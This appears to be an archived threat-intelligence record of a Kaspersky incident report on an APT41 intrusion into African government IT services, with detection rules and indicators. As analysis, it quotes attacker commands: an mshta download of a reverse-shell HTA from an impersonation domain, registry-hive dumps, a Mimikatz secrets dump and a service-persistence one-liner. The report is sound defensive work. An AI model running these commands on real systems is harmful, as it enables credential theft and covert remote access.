{ "id": "a3299aea-2e08-492c-a6d7-b31607e83ab4", "created_at": "2026-04-06T00:15:42.201941Z", "updated_at": "2026-04-10T03:32:21.469098Z", "deleted_at": null, "sha1_hash": "25d53c88b04f5a5155c19e9c1d76ddebca29a1f3", "title": "The SOC files: Rumble in the jungle or APT41’s new target in Africa", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1025306, "plain_text": "The SOC files: Rumble in the jungle or APT41’s new target in\r\nAfrica\r\nBy Denis Kulik\r\nPublished: 2025-07-21 · Archived: 2026-04-05 13:38:21 UTC\r\nIntroduction\r\nSome time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African\r\nregion. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within\r\ntheir malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.\r\nDuring our incident analysis, we were able to determine that the threat actor behind the activity was APT41 (aka\r\nWicked Panda, Brass Typhoon, Barium or Winnti). This is a Chinese-speaking cyberespionage group known for\r\ntargeting organizations across multiple sectors, including telecom and energy providers, educational institutions,\r\nhealthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the\r\nincident, Africa had experienced the least activity from this APT.\r\nDetection\r\nOur MDR team identified suspicious activity on several workstations within an organization’s infrastructure.\r\nThese were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the\r\nalerts showed the following signs of the activity:\r\nA process chain of svchost.exe ➔exe ➔ cmd.exe\r\nThe output of executed commands being written to a file on an administrative network share, with the file\r\nname consisting of numbers separated by dots:\r\nWmiExec process tree\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 1 of 25\n\nThe attackers also leveraged the Atexec module from the Impacket toolkit.\r\nScheduler tasks created by Atexec\r\nThe attackers used these commands to check the availability of their C2 server, both directly over the internet and\r\nthrough an internal proxy server within the organization.\r\nThe source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket\r\nwas executed on it in the context of a service account. We would later get that host connected to our telemetry to\r\npinpoint the source of the infection.\r\nAfter the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.\r\nPrivilege escalation and lateral movement\r\nAfter a brief lull, the attackers sprang back into action. This time, they were probing for running processes and\r\noccupied ports:\r\ncmd.exe /c netstat -ano \u003e C:\\Windows\\temp\\temp_log.log\r\ncmd.exe /c tasklist /v \u003e C:\\Windows\\temp\\temp_log.log\r\nThey were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or\r\nXDR agents, host administration tools, and so on.\r\nAdditionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.\r\ncmd.exe /c reg save HKLM\\SAM C:\\Windows\\temp\\temp_3.log\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 2 of 25\n\ncmd.exe /c reg save HKLM\\SYSTEM C:\\Windows\\temp\\temp_4.log\r\nOn workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in\r\nan empty dump file. However, some hosts within the organization were not secured. As a result, the attackers\r\nsuccessfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This\r\nunderscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be\r\ninstalled on all workstations across the organization without exception. Furthermore, the more comprehensive\r\nyour telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the\r\npermissions assigned to service and user accounts, making sure no one ends up with more access rights than they\r\nreally need. This is especially true for accounts that exist across multiple hosts in your infrastructure.\r\nIn the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for\r\nlateral movement: a domain account with local administrator rights on all workstations, and a backup solution\r\naccount with domain administrator privileges. The local administrator privileges allowed the attackers to use the\r\nSMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will\r\ndiscuss these tools – namely Cobalt Strike and a custom agent – in the next section.\r\nIn most cases, the attackers placed their malicious tools in the C:\\WINDOWS\\TASKS\\ directory on target hosts,\r\nbut they used other paths too:\r\nc:\\windows\\tasks\\\r\nc:\\programdata\\\r\nc:\\programdata\\usoshared\\\r\nc:\\users\\public\\downloads\\\r\nc:\\users\\public\\\r\nc:\\windows\\help\\help\\\r\nc:\\users\\public\\videos\\\r\nFiles from these directories were then executed remotely using the WMI toolkit:\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 3 of 25\n\nLateral movement via privileged accounts\r\nC2 communication\r\nCobalt Strike\r\nThe attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an\r\nencrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected\r\ninto a legitimate application via DLL sideloading.\r\nHere’s a general overview of how Cobalt Strike was launched:\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 4 of 25\n\nAttackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in\r\none of the following directories:\r\nC:\\Users\\Public\\\r\nC:\\Users\\{redacted}\\Downloads\\\r\nC:\\Windows\\Tasks\\\r\nThe malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a\r\nspecifically named file located in the same directory. Consequently, the names of the payload files varied\r\ndepending on what was hardcoded into the malicious DLL.\r\nDuring the attack, the threat actor used the following versions of modified DLLs and their corresponding\r\npayloads:\r\nLegitimate file name DLL Encrypted Cobalt Strike\r\nTmPfw.exe TmDbg64.dll TmPfw.ini\r\ncookie_exporter.exe msedge.dll Logs.txt\r\nFixSfp64.exe log.dll Logs.txt\r\n360DeskAna64.exe WTSAPI32.dll config.ini\r\nKcInst.exe KcInst32.dll kcinst.log\r\nMpCmdRunq.exe mpclient.dll Logs.txt\r\nDespite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar\r\nacross instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 5 of 25\n\ncookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll,\r\nassuming it’s in the same directory.\r\nThe attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious\r\nlibrary of the same name.\r\nWhen any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this\r\nfunction included a check for a debugging environment. Additionally, upon its initial execution, the library\r\nverified the language packs installed on the host. The malicious code would not run if it detected any of the\r\nfollowing language packs:\r\nJapanese (Japan)\r\nKorean (South Korea)\r\nChinese (Mainland China)\r\nChinese (Taiwan)\r\nIf the system passes the checks, the application that loaded the malicious library executes an exported DLL\r\nfunction containing the malicious code. Because different applications were used to launch the library in different\r\ncases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll,\r\nthe malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 6 of 25\n\nThe ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory.\r\nThese filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.\r\nThe screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly\r\nreveals the path where the application expects to find the file.\r\nThe payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:\r\nOnce the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard\r\nmethod: it allocates a virtual memory region within its own process, then copies the code there and executes it by\r\ncreating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the\r\nmalicious code could also be launched by creating a new process or upon being injected into the memory of\r\nanother running process.\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 7 of 25\n\nBeyond the functionality described above, we also found a code segment within the malicious libraries that\r\nappeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running\r\nin a debugger, but in practice this doesn’t occur.\r\nOnce Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish\r\npersistence on the compromised host by creating a service with a command similar to this:\r\nC:\\Windows\\system32\\cmd.exe /C sc create \"server power\" binpath= \"cmd /c start\r\nC:\\Windows\\tasks\\Edge.exe\" \u0026\u0026 sc description \"server power\" \"description\" \u0026\u0026 sc config \"server\r\npower\" start= auto \u0026\u0026 net start \"server power\"\r\nAttackers often use the following service names for embedding Cobalt Strike:\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 8 of 25\n\nserver power\r\nWindowsUpdats\r\n7-zip Update\r\nAgent\r\nDuring our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2.\r\nThey distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server.\r\nEach of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web\r\nshell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded\r\nmultiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL\r\nto retrieve commands:\r\nThe agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with\r\nthe /c flag.\r\nWhile analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers\r\nconstantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file\r\nversions were removed from the compromised hosts.\r\nThe attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser\r\nhistory, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 9 of 25\n\ndata back to the SharePoint server via the upload.ashx web shell.\r\nIt is worth noting that the attackers made some interesting mistakes while implementing the mechanism for\r\ncommunicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server\r\nwas unavailable, the agent would attempt to execute the web page’s error message as a command:\r\nObtaining a command shell: reverse shell via an HTA file\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 10 of 25\n\nIf, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d\r\ntry to establish an alternative command-shell access. To do this, they executed the following command to\r\ndownload from an external resource a malicious HTA file containing an embedded JavaScript script and run this\r\nfile:\r\n\"cmd.exe\" /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta\r\nThe group attempted to mask their malicious activity by using resources that mimicked legitimate ones to\r\ndownload the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain\r\ngithub[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were\r\nresponsible for delivering either the next stage of their malware or the tools needed to further the attack.\r\nAt the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead\r\nof a malicious one. This was likely done to hide the activity and complicate attack analysis.\r\nThe harmless script found on github[.]githubassets[.]net\r\nHowever, we were able to obtain and analyze previously distributed scripts, specifically the malicious file\r\n2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving\r\nthe attackers a shell for executing their commands.\r\nOnce launched, the script gathers initial host information:\r\nIt then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID\r\nalong with the initially collected data. The script leverages various connection methods, such as WebSockets,\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 11 of 25\n\nAJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.\r\nData collection\r\nNext, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive\r\ndata. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised\r\nSharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the\r\nserver. The files were transferred to a network share on the SharePoint server.\r\nPillager\r\nA modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather\r\nsensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager\r\nversion is publicly available in a repository, accompanied by a description in Chinese.\r\nThe primary types of data collected by this utility include:\r\nSaved credentials from browsers, databases, and administrative utilities like MobaXterm\r\nProject source code\r\nScreenshots\r\nActive chat sessions and data\r\nEmail messages\r\nActive SSH and FTP sessions\r\nA list of software installed on the host\r\nOutput of the systeminfo and tasklist commands\r\nCredentials stored and used by the operating system, and Wi-Fi network credentials\r\nAccount information from chat apps, email clients, and other software\r\nA sample of data collected by Pillager:\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 12 of 25\n\nThe utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it\r\ninto a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used\r\nfor generating code from Managed Object Format (MOF) files.\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 13 of 25\n\nDespite modifying the code, the group didn’t change the stealer’s default output file name and path:\r\nC:\\Windows\\Temp\\Pillager.zip.\r\nIt’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering\r\nlibrary from the Xbox Development Kit. The source code for this library is available on GitHub. This code was\r\nmodified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 14 of 25\n\nInterestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:\r\nCheckout\r\nThe second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it\r\nalso steals information about downloaded files and credit card data saved in the browser.\r\nWhen launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware\r\ncollects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created\r\ndirectory named CheckOut.\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 15 of 25\n\nData collection and archiving in Checkout\r\nCheckout launch diagram in Kaspersky Threat Intelligence Platform\r\nRawCopy\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 16 of 25\n\nBeyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly\r\navailable utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.\r\nRawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading\r\nmethod.\r\nThe following commands were used to collect registry files:\r\nc:\\users\\public\\downloads\\RawCopy.exe /FileNamePath:C:\\Windows\\System32\\Config\\system\r\n/OutputPath:c:\\users\\public\\downloads\r\nc:\\users\\public\\downloads\\RawCopy.exe /FileNamePath:C:\\Windows\\System32\\Config\\sam\r\n/OutputPath:c:\\users\\public\\downloads\r\nc:\\users\\public\\downloads\\RawCopy.exe /FileNamePath:C:\\Windows\\System32\\Config\\security\r\n/OutputPath:c:\\users\\public\\downloads\r\nMimikatz\r\nThe attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten\r\nand compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java\r\ncode) via DLL sideloading. The following files were involved in launching Mimikatz:\r\nC:\\Windows\\Temp\\123.bat\r\nC:\\Windows\\Temp\\jli.dll\r\nC:\\Windows\\Temp\\java.exe\r\nС:\\Windows\\Temp\\config.ini\r\n123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads\r\nthe dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration\r\nfile, config.ini, which is distributed from a previously compromised host within the infrastructure.\r\njava.exe privilege::debug token::elevate lsadump::secrets exit\r\nRetrospective threat hunting\r\nAs already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the\r\nearly stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 17 of 25\n\nthat host. After some time, the host was finally connected to our monitoring systems, and we found that it was an\r\nIIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.\r\nThese included the aforementioned Cobalt Strike implant located in c:\\programdata\\, along with a scheduler task\r\nfor establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions\r\ndetected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for\r\ncompiled ASP.NET application files:\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net\r\nfiles\\root\\dedc22b8\\49ac6571\\app_web_hdmuushc.dll\r\nMD5: 0x70ECD788D47076C710BF19EA90AB000D\r\nThese temporary files are automatically generated and contain the ASPX page code:\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 18 of 25\n\nThe web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names,\r\nwe were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.\r\nThis tool is used to proxy traffic from an external network to an internal one via an externally accessible web\r\nserver. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified\r\nat the time (the IIS server), was in fact coming from the external network through this tunnel.\r\nAttribution\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 19 of 25\n\nWe attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling,\r\nand C2 infrastructure with other APT41 campaigns. In particular:\r\nThe attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.\r\nThe attackers employed DLL sideloading techniques.\r\nDuring the attack, various files were saved to C:\\Windows\\Temp.\r\nThe C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com)\r\nare similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online,\r\nstatus[.]s3cloud-azure[.]com).\r\nTakeaways and lessons learned\r\nThe attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use\r\npenetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their\r\ntarget’s infrastructure, updating their malicious tools to account for specific characteristics. They can even\r\nleverage internal services for C2 communication and data exfiltration. The files discovered during the\r\ninvestigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for\r\nexample, by rewriting executables and compiling them as DLLs for DLL sideloading.\r\nWhile this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s\r\nsystems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and\r\ncontinuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t\r\nconnected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to\r\nmaintain maximum coverage of your infrastructure with security tools that can automatically block malicious\r\nactivity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and\r\nespecially against using such accounts on all hosts across the infrastructure.\r\nAppendix\r\nRules\r\nYara\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nrule neoregeorg_aspx_web_shell\r\n{\r\n    meta:\r\n        description = \"Rule to detect neo-regeorg based ASPX web-shells\"\r\n        author = \"Kaspersky\"\r\n        copyright = \"Kaspersky\"\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 20 of 25\n\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n        distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY\r\nMULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\r\n    strings:\r\n        $func1 = \"FrameworkInitialize\" fullword\r\n        $func2 = \"GetTypeHashCode\" fullword\r\n        $func3 = \"ProcessRequest\" fullword\r\n        $func4 = \"__BuildControlTree\"\r\n        $func5 = \"__Render__control1\"\r\n        $str1 = \"FAIL\" nocase wide\r\n        $str2 = \"Port close\" nocase wide\r\n        $str3 = \"Port filtered\" nocase wide\r\n        $str4 = \"DISCONNECT\" nocase wide\r\n        $str5 = \"FORWARD\" nocase wide\r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        filesize \u003c 400000 and\r\n        3 of ($func*) and\r\n        3 of ($str*)\r\n}\r\nSigma\r\n1\r\n2\r\n3\r\ntitle: Service Image Path Start From CMD\r\nid: faf1e809-0067-4c6f-9bef-2471bd6d6278\r\nstatus: test\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 21 of 25\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\ndescription: Detects creation of unusual service executable starting from cmd /c using command line\r\nreferences:\r\n    - tbd\r\ntags:\r\n    - attack.persistence\r\n    - attack.T1543.003\r\nauthor: Kaspersky\r\ndate: 2025/05/15  \r\nlogsource:                      \r\n    product: windows        \r\n    service: security\r\ndetection:\r\n    selection:\r\n        EventID: 4697\r\n        ServiceFileName|contains:\r\n            - '%COMSPEC%'\r\n            - 'cmd'\r\n            - 'cmd.exe'\r\n        ServiceFileName|contains|all:\r\n            -  '/c'\r\n            - 'start'\r\n    condition: selection\r\nfalsepositives:\r\n    - Legitimate\r\nlevel: medium\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 22 of 25\n\nIOCs\r\nFiles\r\n2F9D2D8C4F2C50CC4D2E156B9985E7CA\r\n9B4F0F94133650B19474AF6B5709E773\r\nA052536E671C513221F788DE2E62316C\r\n91D10C25497CADB7249D47AE8EC94766\r\nC3ED337E2891736DB6334A5F1D37DC0F\r\n9B00B6F93B70F09D8B35FA9A22B3CBA1\r\n15097A32B515D10AD6D793D2D820F2A8\r\nA236DCE873845BA4D3CCD8D5A4E1AEFD\r\n740D6EB97329944D82317849F9BBD633\r\nC7188C39B5C53ECBD3AEC77A856DDF0C\r\n3AF014DB9BE1A04E8B312B55D4479F69\r\n4708A2AE3A5F008C87E68ED04A081F18\r\n125B257520D16D759B112399C3CD1466\r\nC149252A0A3B1F5724FD76F704A1E0AF\r\n3021C9BCA4EF3AA672461ECADC4718E6\r\nF1025FCAD036AAD8BF124DF8C9650BBC\r\n100B463EFF8295BA617D3AD6DF5325C6\r\n2CD15977B72D5D74FADEDFDE2CE8934F\r\n9D53A0336ACFB9E4DF11162CCF7383A0\r\nDomains and IPs\r\n47.238.184[.]9\r\n38.175.195[.]13\r\nhxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta\r\nhxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa\r\nhxxp://toun[.]callback.red/aaa\r\nhxxp://asd.xkx3[.]callback.[]red\r\nhxxp[:]//ap-northeast-1.s3-azure[.]com\r\nhxxps[:]//www[.]msn-microsoft[.]org:2053\r\nhxxp[:]//www.upload-microsoft[.]com\r\ns3-azure.com\r\n*.ns1.s3-azure.com\r\n*.ns2.s3-azure.com\r\nupload-microsoft[.]com\r\nmsn-microsoft[.]org\r\nMITRE ATT\u0026CK\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 23 of 25\n\nTactic Technique ID\r\nInitial Access\r\nValid Accounts: Domain Accounts T1078.002\r\nExploit Public-Facing Application T1190\r\nExecution\r\nCommand and Scripting Interpreter: PowerShell T1059.001\r\nCommand and Scripting Interpreter: Windows Command Shell T1059.003\r\nScheduled Task/Job: Scheduled Task T1053.005\r\nWindows Management Instrumentation T1047\r\nPersistence\r\nCreate or Modify System Process: Windows Service T1543.003\r\nHijack Execution Flow: DLL Side-Loading T1574.002\r\nScheduled Task/Job: Scheduled Task T1053.005\r\nValid Accounts: Domain Accounts T1078.002\r\nWeb Shell T1505.003\r\nIIS Components T1505.004\r\nPrivilege Escalation\r\nCreate or Modify System Process: Windows Service T1543.003\r\nHijack Execution Flow: DLL Side-Loading T1574.002\r\nProcess Injection T1055\r\nScheduled Task/Job: Scheduled Task T1053.005\r\nValid Accounts: Domain Accounts T1078.002\r\nDefense Evasion\r\nHijack Execution Flow: DLL Side-Loading T1574.002\r\nDeobfuscate/Decode Files or Information T1140\r\nIndicator Removal: File Deletion T1070.004\r\nMasquerading T1036\r\nProcess Injection T1055\r\nCredential Access\r\nCredentials from Password Stores: Credentials from Web Browsers T1555.003\r\nOS Credential Dumping: Security Account Manager T1003.002\r\nUnsecured Credentials T1552\r\nDiscovery Network Service Discovery T1046\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 24 of 25\n\nProcess Discovery T1057\r\nSystem Information Discovery T1082\r\nSystem Network Configuration Discovery T1016\r\nLateral movement\r\nLateral Tool Transfer T1570\r\nRemote Services: SMB/Windows Admin Shares T1021.002\r\nCollection\r\nArchive Collected Data: Archive via Utility T1560.001\r\nAutomated Collection T1119\r\nData from Local System T1005\r\nCommand and Control\r\nApplication Layer Protocol: Web Protocols T1071.001\r\nApplication Layer Protocol: DNS T1071.004\r\nIngress Tool Transfer T1105\r\nProxy: Internal Proxy T1090.001\r\nProtocol Tunneling T1572\r\nExfiltration\r\nExfiltration Over Alternative Protocol T1048\r\nExfiltration Over Web Service T1567\r\nSource: https://securelist.com/apt41-in-africa/116986/\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 25 of 25", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://securelist.com/apt41-in-africa/116986/" ], "report_names": [ "116986" ], "threat_actors": [ { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434542, "ts_updated_at": 1775791941, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/25d53c88b04f5a5155c19e9c1d76ddebca29a1f3.pdf", "text": "https://archive.orkl.eu/25d53c88b04f5a5155c19e9c1d76ddebca29a1f3.txt", "img": "https://archive.orkl.eu/25d53c88b04f5a5155c19e9c1d76ddebca29a1f3.jpg" } }